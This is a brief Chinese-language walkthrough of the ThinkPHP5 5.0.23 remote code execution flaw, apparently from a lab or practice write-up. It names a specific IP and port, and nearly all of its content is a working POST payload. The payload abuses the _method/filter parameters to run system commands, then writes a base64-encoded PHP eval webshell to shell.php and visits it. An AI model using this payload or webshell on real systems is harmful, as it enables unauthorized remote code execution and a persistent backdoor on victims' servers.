ThinkPHP5 5.0.23远程代码执行漏洞
http://159.75.16.25:8089/index.php?s=captcha会出现如下报错
F12进入开发者 用HackBar 插件发送 POST 请求
得到回显:
通过echo命令写入 Webshell 文件
首先将一句话木马进行 Base64 编码
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2FhYSddKSA/PmJi | base64 -d > shell.php
访问shell.Php